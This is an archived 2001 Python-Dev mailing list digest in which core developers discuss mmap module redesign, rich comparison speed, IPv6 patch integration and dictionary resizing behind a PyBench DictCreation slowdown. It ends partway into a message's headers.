In the CVS log of the mmapmodule.c, Tim Peters says:

"The code really needs to be rethought from scratch (not by me, though
...)."

Well, I might be the person to do the rethinking, but I'd first like
to know what Tim has in mind.  I've been playing around with this
module lately and tend to agree that some enhancements could be made,
particularly to prevent "bus errors" and "segmentation faults".  The
ability to have offsets into a file that are not multiples of the
system pagesize would also be nice.

I'd be willing to submit a PEP on a new mmapmodule, once I know what
others would like.

 -- Paul

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From tim.one at home.com  Thu May 17 18:02:38 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 12:02:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.  I realize I
> probably haven't expressed this thought clearly, and I'm not going to
> push for this to happen quickly or forecefully, but it's nevertheless
> how I see things.  I expect it would allow a tremendous cleanup of the
> comparison code.  It will never reach the simplicity of cmp() -- but
> think of Einstein's (?) rule "things should be as simple as they can
> be, but no simpler."  Clearly cmp() was too simple. :-)
>
> Anyway, it worries me whenever I hear someone express the thought that
> adding rich comparisons to a particular object type would be a bad
> idea because it would slow things down.

At the moment, "almost all" comparisons in the dynamic sense have no need of
richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple
<wink>.  For now richcmps are a tail-wagging-the-dog phenomenon, or more like
the tail growing 10 pounds of dense matted hair, making the once-frisky puppy
slow to a crawl because its butt is scraping the ground <wink>.

Martin and I can resolve our differences wrt strings via getting rid of old
strcmp entirely.  Do you like the implications?

1. Code using cmp(string1, string2) will clearly run significantly
   slower, calling string comparison 1 (when == obtains), 2 (when <
   obtains), or 3 (when > obtains) times instead of always once only.
   Since == is the least likely outcome when using cmp() on strings
   (you can conclude that by instrumenting Python, or by common
   sense <0.5 wink>), the number of string compare calls more than
   doubles in practice for string cmp()-slinging programs (which
   includes existing well-written tree-based lookup schemes).

2. String dictionary lookup will, unlike the general non-dict case
   Martin instrumented, never pass the new "are the pointers the
   same?" richcmp Py_EQ test (because dict lookup already makes that
   test inline).  So if old strcmp goes away, dict lookups that
   have to resort to strcmp will start paying for hopeless tests.
   OTOH, the "pointers equal?" test looks of dubious value for the
   non-dict string case anyway (where it succeeded only 1 in 20
   times).

#2 is a special case that can be special-cased to death, but #1 likely
applies to code using cmp() for comparisons of objects of any type, and
that's the primary reason I've resisted adding richcmps to the
heavily-compared types (variously string, int, float, long, and type
objects).  Also the case that adding "a fast path" shouldn't have to endure
wading thru multiple gimmicks (kinda defeats the idea of "fast" <wink>), so
the instant *one* heavily-compared basic type grows a richcmp (there are 0
such today), all should.

So that's what I'll aim at.


From guido at digicool.com  Thu May 17 20:18:27 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 14:18:27 -0400
Subject: [Python-Dev] IPv6
Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com>

What's out IPv6 story?  I recall that someone once sent me patches,
but they didn't work for me.  Is it time to try again?  In certain
circles IPv6 support in Python would be enough to switch programming
languages... :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 21:45:29 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 21:45:29 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de>

> 1. Code using cmp(string1, string2) will clearly run significantly
>    slower, calling string comparison 1 (when == obtains), 2 (when <
>    obtains), or 3 (when > obtains) times instead of always once only.

I'd like to question the rationale behind this procedure. If a type
has both tp_compare and tp_richcompare, and the application is
performing cmp(o1, o2): Why is it then a good thing to emulate 3way
compare using rich compare?

I just changed the order in do_cmp, to the IMO more correct 

	if (v->ob_type == w->ob_type
	    && (f = v->ob_type->tp_compare) != NULL)
		return (*f)(v, w);
	c = try_rich_to_3way_compare(v, w);
	if (c < 2)
		return c;
	c = try_3way_compare(v, w);
	if (c < 2)
		return c;
	return default_3way_compare(v, w);

With that, I got only a single failure in the test suite:
test_userlist fails with

exceptions.RuntimeError: UserList.__cmp__() is obsolete

Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I
agree.

According to the CVS log, this implementation of do_cmp was installed
in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
rationale for doing do_cmp in that order?

Regards,
Martin


From tim at digicool.com  Fri May 18 00:55:19 2001
From: tim at digicool.com (Tim Peters)
Date: Thu, 17 May 2001 18:55:19 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>

The worst percentage hit in both MAL's and Jeremy's pybench run was (here
showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's <wink>):

        DictCreation:      87.80 ms    2.93 us  +115.72%

Assorted things do not account for it:  the new overhead of linking and
unlinking dicts into the gc list (at creation and destruction times) seems
to account for no more than 2%; and the overhead due to using the slower
lookdict (as opposed to lookdict_string) even less.

Jeremy cheated by running a profiler:  the true cause is that dictresize
gets called about twice as often.

Before 2.1:  *before* inserting an item, we checked to see whether the dict
was at the resize point.  If so, we resized it.  Note that this meant
PyDict_SetItem could grow a dict even if no new entry was made (and that
this was the cause of several excruciating bugs in the 2.1 release cycle,
since it meant a dict could get reshuffled merely when replacing the values
associated with existing keys).

2.1:  *after* inserting an item, and if the key was new (i.e., the dict grew
a new entry, as opposed to just replacing the value associated with an
existing key), and the dict is at the resize point, we resize it.

Now the DictCreation test overwhelmingly creates dicts of size exactly 3.
The dict resizes from empty to capacity 4 on the way to gaining 2 entries.
When adding the third:

Before 2.1:  2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up
remaining a capacity-4 dict with 3 slots full.  This actually violates a
documented dict invariant (i.e., that dicts are never more than 2/3rd full).

2.1:  The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we
*do* resize it, and the dict ends up with 3 of 8 slots full.

I've got no interest in trying to restore the old behavior.  A compromise
may be to boost the minimum size of a non-empty dict from 4 to 8.  As is,
the only non-empty dicts that can get away with using the current minimum
size of 4 have no more than 2 elements.  The question is whether such tiny
non-empty dicts are common enough to make everyone else pay for "an extra"
resize.

go-ahead-just-*try*-to-prove-your-answer<wink>-ly y'rs  - tim


From skip at pobox.com  Fri May 18 01:21:50 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 18:21:50 -0500
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <15108.23822.538016.564151@beluga.mojam.com>

    Guido> In certain circles IPv6 support in Python would be enough to
    Guido> switch programming languages... :-)

Sounds like someone has caught the scent of world domination... ;-)

S


From jeremy at digicool.com  Thu May 17 20:39:07 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 14:39:07 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.6859.810306.811326@slothrop.digicool.com>

Another option is to change the benchmark to put one more item in the
dict.  Then the same number of resizes would occur with both versions
of Python.

Jeremy


From tim.one at home.com  Fri May 18 02:08:13 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 20:08:13 -0400
Subject: [Python-Dev] mmap module
In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>

[Paul Barrett]
> In the CVS log of the mmapmodule.c, Tim Peters says:
>
> "The code really needs to be rethought from scratch (not by me, though
> ...)."

That was in specific reference to the code I changed, in mmap_find_method.
The difficulty is that mmap is great for "large files", but the code before
my change used a C int for the starting offset and also for the return value;
I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but
doesn't help 64-bit Windows at all (where a C long remains 4 bytes).  The
mmap_object struct uses size_t to declare the relevant members, which is
possibly better still than C long, but may still leave platform capabilities
out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit
offsets when creating a mapped file view).  C is a friggin' mess here, and
Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range
of C integral types anyway.  In other words, if this code is ever to reach
its full potential, it "really needs to be rethought from scratch".

> Well, I might be the person to do the rethinking, but I'd first like
> to know what Tim has in mind.

Nothing that you did <wink>.

> I've been playing around with this module lately and tend to agree
> that some enhancements could be made, particularly to prevent "bus
> errors" and "segmentation faults".

When you get one of those, it's a bug in Python!

> The ability to have offsets into a file that are not multiples of the
> system pagesize would also be nice.

It's OS-specific.  Python should grow warts to protect against it on the OSes
that care.

> I'd be willing to submit a PEP on a new mmapmodule, once I know what
> others would like.

Hard to say.  This has the potential to become Python's next thread
subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
you do write a PEP, I vote to say that we'll cover Windows and Linux (and
maybe Mac OS X?) out of the box, but any other platform is at your own risk
(it doesn't really help if somebody pops up volunteering to support a
minority platform, because they eventually go away, their code stops working,
and it never gets fixed -- so it's use-at-your-own-risk in reality
regardless).


From tim.one at home.com  Fri May 18 02:29:18 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 20:29:18 -0400
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKKCAA.tim.one@home.com>

[Guido van Rossum]
> What's out IPv6 story?

Ah!  If that's version 6 of the Integer-Point alternative to Floating-Point,
I've got it covered.  Otherwise my guess is we have no story at all.

> I recall that someone once sent me patches, but they didn't work for me.

Try recompiling with -DLONG_BIT=33.

> Is it time to try again?  In certain circles IPv6 support in Python
> would be enough to switch programming languages... :-)

Floating-point is *that* bad?!

ever-helpful-ly y'rs  - tim


From jeremy at digicool.com  Fri May 18 00:16:15 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 18:16:15 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.19887.534514.864376@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim at digicool.com> writes:

  TP> I've got no interest in trying to restore the old behavior.  A
  TP> compromise may be to boost the minimum size of a non-empty dict
  TP> from 4 to 8.  As is, the only non-empty dicts that can get away
  TP> with using the current minimum size of 4 have no more than 2
  TP> elements.  The question is whether such tiny non-empty dicts are
  TP> common enough to make everyone else pay for "an extra" resize.

I also did a profile run on CreateInstances, which has a difference of
+55.54% on my machine.  It's basically the same story.  The instance
dictionary is getting resized more often with Python 2.1+ than it did
with Python 1.5.2.  I wouldn't be surprised if several more tests are
showing a slowdown with the same cause.

So boosting the minimum size sounds like a good thing.

Jeremy


From tim.one at home.com  Fri May 18 05:26:52 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 23:26:52 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOOKCAA.tim.one@home.com>

[/F]
> more info here:
>
> http://home.rica.net/alphae/419coal/index.htm
>
>     "A Five Billion US$ (as of 1996, much more now) worldwide
>     Scam which has run since the early 1980's under Successive
>     Governments of Nigeria.
>
>     "The Nigerian Scam is, according to published reports, the
>     Third to Fifth largest industry in Nigeria."

Most interesting to me is that US Post Office is upset about this:

    http://www.usps.gov/websites/depart/inspect/pressrel.htm

They don't seem to care so much that people are getting scammed, but that the
letters mailed from Nigeria to advance the fee-extorting phase of the scam
often use counterfeit postage!  Where else but here

    http://www.usps.gov/websites/depart/inspect/metercap.htm

could you learn that "Postage meters are not used in Nigeria -? therefore,
all postage meter impressions on Nigerian mail are counterfeit!"?

governments-are-mostly-insane-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Fri May 18 06:45:21 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 18 May 2001 06:45:21 +0200
Subject: [Python-Dev] IPv6
References: <oqbsosgh94.fsf@lin2.sram.qc.ca>
Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de>

> What's out IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

It's still on SF,

http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470

There are two problems with that patch, AFAICT:

1. It is too large for any individual to review in one chunk.
2. It gets quickly outdated.
3. It touches core aspects of the socket handling that are IMO better
   untouched. I don't know whether the generalization proposed there
   is necessary to support IPv6 reasonably - the author certainly feels
   it is.

To integrate the patch, I would propose to split it into smaller
parts, and submit and review them one-by-one. The first patch should
deal only with autoconf stuff, so that the proper #defines are in
config.h (although they would not be used right away). The second
patch should be a tar file of all new files (the patch on SF actually
misses some files). The third patch should include changes to the C
modules, and the last one changes to the standard library modules.

For that procedure to work, we need cooperation from the
submitter. For that, we probably need to indicate that we are really
interested in his work, and will work with him to integrate it into
Python. So far, his impression must be that nobody is interested - the
patch is sitting there since 2000-08-16, making it the oldes open
patch.

Undoubtedly, integrating this piece of work will result in various
problems with Python CVS: it won't build anymore on "funny machines"
(like Windows), and it might even crash on code that used to work just
fine. This prediction is not based on the actual content of the patch,
merely on its size, and the fact that IPv6 support is experimental on
many systems. So we'ld also need a BDFL pronouncement that we really
really want this, and that anybody running into problems should either
help fixing them, or stay away from CVS while it is being integrated.

Regards,
Martin


From tim at digicool.com  Fri May 18 09:17:07 2001
From: tim at digicool.com (Tim Peters)
Date: Fri, 18 May 2001 03:17:07 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>

[Jeremy]
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
>
> So boosting the minimum size sounds like a good thing.

I don't know.  PyBench is great for showing that *something* changed, but
it's got even less claim to "typical use" than pystone.

I don't know that the test suite is better in that respect, but it's got much
more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
record the ma_fill of each dict on its way to the grave (ma_fill == number of
non-virgin slots).  Across the test suite, here's the ranking, from most to
least popular fill:

  count    fill %total  cumulative %
 ------    ---- ------  ------------
 146321       1  53.30  53.30
  38200       0  13.91  67.21
  32616       2  11.88  79.09
  29648       3  10.80  89.89
   9884       5   3.60  93.49
   5423       4   1.98  95.47
   2428       6   0.88  96.35
   2016       8   0.73  97.08
   1179       7   0.43  97.51
    904       9   0.33  97.84
    709     103   0.26  98.10
    554      10   0.20  98.30
    513      13   0.19  98.49
    459      12   0.17  98.66
    447      11   0.16  98.82
    364      14   0.13  98.95
    233      15   0.08  99.04
    231      16   0.08  99.12
    193      18   0.07  99.19
    180      17   0.07  99.26
    122      19   0.04  99.30
    107      30   0.04  99.34
    105      21   0.04  99.38
     93      22   0.03  99.41
     93      20   0.03  99.45
     86     256   0.03  99.48
     82      23   0.03  99.51
     80      26   0.03  99.54
     74      24   0.03  99.56
     69      27   0.03  99.59
     64      25   0.02  99.61
     60      29   0.02  99.63
     49      28   0.02  99.65
     44      34   0.02  99.67
     33      32   0.01  99.68
     28      31   0.01  99.69
     27      37   0.01  99.70
     27      33   0.01  99.71
     26      35   0.01  99.72
     24      36   0.01  99.73
     23      39   0.01  99.74
     23      38   0.01  99.75
     21     128   0.01  99.75
     19      44   0.01  99.76
     19      40   0.01  99.77
     17      46   0.01  99.77
     16      48   0.01  99.78
     15      47   0.01  99.78
     14      50   0.01  99.79
     14      42   0.01  99.79

There are many more sizes, but I cut off the display here when they got too
rare to round to 1% of 1% of the total count.

Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
away with at most one resize (a dict of size 8 is enough for a fill of 5, but
not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
alive *at the same time*, it would be quite a waste of space to force the
non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
things like building one- or two-element keyword argument dicts, their
lifetimes rarely overlap.

A more aggressive idea is to allow denser dicts, by allowing them to become
no more than 75% full.  That is, change the resize test from

    mp->ma_fill*3 >= mp->ma_size*2

to

    mp->ma_fill*4 > mp->ma_size*3

That would allow the 10.8% of real(er) life dicts with fill 3 to continue
living in dicts with 4 slots, and allow about 90% of all dicts to get away
with no more than one resize.  The downside is that boosting the max load
factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
a small boost in the expected # of compares.  But the "theory" is for random
hash functions with "uniform probing" (tech term that does *not* mean linear
probing), and Python's hash functions often aren't random at all, while AFAIK
no rigorous analysis of its probing strategy exists.

So, plenty of arbitrary data there upon which to flip a coin <wink>.


From mal at lemburg.com  Fri May 18 09:26:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 09:26:36 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <3B04CEAC.57251CD7@lemburg.com>

Jeremy Hylton wrote:
> 
> >>>>> "TP" == Tim Peters <tim at digicool.com> writes:
> 
>   TP> I've got no interest in trying to restore the old behavior.  A
>   TP> compromise may be to boost the minimum size of a non-empty dict
>   TP> from 4 to 8.  As is, the only non-empty dicts that can get away
>   TP> with using the current minimum size of 4 have no more than 2
>   TP> elements.  The question is whether such tiny non-empty dicts are
>   TP> common enough to make everyone else pay for "an extra" resize.
> 
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
> 
> So boosting the minimum size sounds like a good thing.

FYI, I have a patch which inlines small dictionaries directly
into the type object (rather than usin malloc to allocate
the slot buffer).

I've experimented with the minimal size a lot and found that
setting it to 8 slots gives the bext performance/memory tradeoff.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim at digicool.com  Fri May 18 10:32:39 2001
From: tim at digicool.com (Tim Peters)
Date: Fri, 18 May 2001 04:32:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>

[MAL]
> FYI, I have a patch which inlines small dictionaries directly
> into the type object

You don't mean that, but how about uploading the patch to SF anyway?  Assign
it to me and I'll dig into it.

> ...
> I've experimented with the minimal size a lot and found that
> setting it to 8 slots gives the bext performance/memory tradeoff.

Having done just a couple rounds of instrumented runs across various apps, I
was moving to that conclusion too.  Also that "small" dicts are so common
that avoiding the "extra" malloc would be a nice win for them, and that large
dicts are rare enough and resizing expensive enough anyway that the new cost
of doing a two-headed allocation strategy would be lost in the noise.  IOW,
I'm inclined to believe that everything you say your patch does is Good For
Python, and Guido is so sympathetic to my lack of sleep lately that I bet
he'll let me slip in one uglification without scowling <wink>.


From mal at lemburg.com  Fri May 18 13:36:28 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:36:28 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B05093C.8248AE96@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

Right, I meant the dict object... (the "not enough coffee" thingie
again ;-)
 
> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the bext performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

I'll see if I find time today to rework the patch for Python CVS.
The patch is hiding in my old Python 1.5 killer patch ;-) -- which
gives more than a 50% boost on my machine, but that's another
story.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 18 13:38:39 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:38:39 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>
Message-ID: <3B0509BF.A2F84A30@lemburg.com>

Tim Peters wrote:
> 
> [Jeremy]
> > I also did a profile run on CreateInstances, which has a difference of
> > +55.54% on my machine.  It's basically the same story.  The instance
> > dictionary is getting resized more often with Python 2.1+ than it did
> > with Python 1.5.2.  I wouldn't be surprised if several more tests are
> > showing a slowdown with the same cause.
> >
> > So boosting the minimum size sounds like a good thing.
> 
> I don't know.  PyBench is great for showing that *something* changed, but
> it's got even less claim to "typical use" than pystone.

It doesn't claim "typical use". pybench is aimed at finding out
performance issues about hot-spots -- there's no such thing as
a "typical program", so pybench gives you low level performance
compares for very specific tasks, e.g. dictionary creation or
for-loop performance.

I have found it to be rather successful at that. At least gives
some good hints at where to look...
 
> I don't know that the test suite is better in that respect, but it's got much
> more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
> record the ma_fill of each dict on its way to the grave (ma_fill == number of
> non-virgin slots).  Across the test suite, here's the ranking, from most to
> least popular fill:
> 
>   count    fill %total  cumulative %
>  ------    ---- ------  ------------
>  146321       1  53.30  53.30
>   38200       0  13.91  67.21
>   32616       2  11.88  79.09
>   29648       3  10.80  89.89
>    9884       5   3.60  93.49
>    5423       4   1.98  95.47
>    2428       6   0.88  96.35
>    2016       8   0.73  97.08
>    1179       7   0.43  97.51
>     904       9   0.33  97.84
>     709     103   0.26  98.10
>     554      10   0.20  98.30
>     513      13   0.19  98.49
>     459      12   0.17  98.66
>     447      11   0.16  98.82
>     364      14   0.13  98.95
>     233      15   0.08  99.04
>     231      16   0.08  99.12
>     193      18   0.07  99.19
>     180      17   0.07  99.26
>     122      19   0.04  99.30
>     107      30   0.04  99.34
>     105      21   0.04  99.38
>      93      22   0.03  99.41
>      93      20   0.03  99.45
>      86     256   0.03  99.48
>      82      23   0.03  99.51
>      80      26   0.03  99.54
>      74      24   0.03  99.56
>      69      27   0.03  99.59
>      64      25   0.02  99.61
>      60      29   0.02  99.63
>      49      28   0.02  99.65
>      44      34   0.02  99.67
>      33      32   0.01  99.68
>      28      31   0.01  99.69
>      27      37   0.01  99.70
>      27      33   0.01  99.71
>      26      35   0.01  99.72
>      24      36   0.01  99.73
>      23      39   0.01  99.74
>      23      38   0.01  99.75
>      21     128   0.01  99.75
>      19      44   0.01  99.76
>      19      40   0.01  99.77
>      17      46   0.01  99.77
>      16      48   0.01  99.78
>      15      47   0.01  99.78
>      14      50   0.01  99.79
>      14      42   0.01  99.79
> 
> There are many more sizes, but I cut off the display here when they got too
> rare to round to 1% of 1% of the total count.
> 
> Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
> away with at most one resize (a dict of size 8 is enough for a fill of 5, but
> not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
> dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
> alive *at the same time*, it would be quite a waste of space to force the
> non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
> things like building one- or two-element keyword argument dicts, their
> lifetimes rarely overlap.

I found that instance dictionaries are usual within the 8 slot
range. You normally have a few heavy wheight instances and 
many light wheight ones which only have two or three attributes
in their instance dict.
 
> A more aggressive idea is to allow denser dicts, by allowing them to become
> no more than 75% full.  That is, change the resize test from
> 
>     mp->ma_fill*3 >= mp->ma_size*2
> 
> to
> 
>     mp->ma_fill*4 > mp->ma_size*3
> 
> That would allow the 10.8% of real(er) life dicts with fill 3 to continue
> living in dicts with 4 slots, and allow about 90% of all dicts to get away
> with no more than one resize.  The downside is that boosting the max load
> factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
> a small boost in the expected # of compares.  But the "theory" is for random
> hash functions with "uniform probing" (tech term that does *not* mean linear
> probing), and Python's hash functions often aren't random at all, while AFAIK
> no rigorous analysis of its probing strategy exists.
> 
> So, plenty of arbitrary data there upon which to flip a coin <wink>.

Why not make those parameters macros at the top of dictobject.c
which can then be tuned to whatever the programmer needs/wants ?!

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Fri May 18 17:05:45 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 10:05:45 -0500
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400."
             <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> 
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> 
Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>

> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

(I guess he means the buffer is alloc'ed contiguously with the dict
object head.  That's often a nice strategy.  Could do that for small
lists too maybe, except those haven't gotten anybody's attention just
yet.)

> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the bext performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

Yeah, this one sounds like a nice improvement.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas at xs4all.net  Fri May 18 17:00:21 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:00:21 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>
Message-ID: <20010518170021.B16811@xs4all.nl>

On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote:

> (I guess he means the buffer is alloc'ed contiguously with the dict
> object head.  That's often a nice strategy.  Could do that for small
> lists too maybe, except those haven't gotten anybody's attention just
> yet.)

Sounds to me like it would benifit tuples even more than lists or dicts. At
least in my code, I see more short tuples than short lists, and they are
usually not altered after creation ;-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From fdrake at acm.org  Fri May 18 17:12:34 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 18 May 2001 11:12:34 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518170021.B16811@xs4all.nl>
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
	<200105181505.KAA16890@cj20424-a.reston1.va.home.com>
	<20010518170021.B16811@xs4all.nl>
Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com>

Thomas Wouters writes:
 > Sounds to me like it would benifit tuples even more than lists or dicts. At
 > least in my code, I see more short tuples than short lists, and they are
 > usually not altered after creation ;-)

  The slots of tuples are already allocated inline, so I don't think
they'll get much better.  ;-)


-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido at digicool.com  Fri May 18 17:27:39 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:27:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
